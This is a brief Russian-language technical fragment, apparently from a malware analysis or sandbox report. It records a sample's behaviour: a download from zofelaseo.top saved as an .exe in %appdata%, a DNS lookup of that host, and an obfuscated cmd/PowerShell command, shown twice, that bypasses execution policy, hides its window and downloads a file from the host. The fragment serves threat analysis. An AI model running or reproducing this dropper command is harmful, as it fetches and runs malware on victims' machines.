Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowershE^Ll^.^EX^E^ -^e^X^ecUTiO^NpoLI^CY^ byp^a^sS ^-nOP^r^Of^I^le^ -^w^iND^oW^stY^le ^HIDdEn^ ^(^n^Ew^-^Ob^jeCT sys^TeM^.net.wEB^c^L^IeN^T).D^ownlOadF^ILE^('http://zofelaseo.top...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PowershE^Ll^.^EX^E^ -^e^X^ecUTiO^NpoLI^CY^ byp^a^sS ^-nOP^r^Of^I^le^ -^w^iND^oW^stY^le ^HIDdEn^ ^(^n^Ew^-^Ob^jeCT sys^TeM^.net.wEB^c^L^IeN^T).D^ownlOadF^ILE^('http://zofelaseo.top...' (со скрытым окном)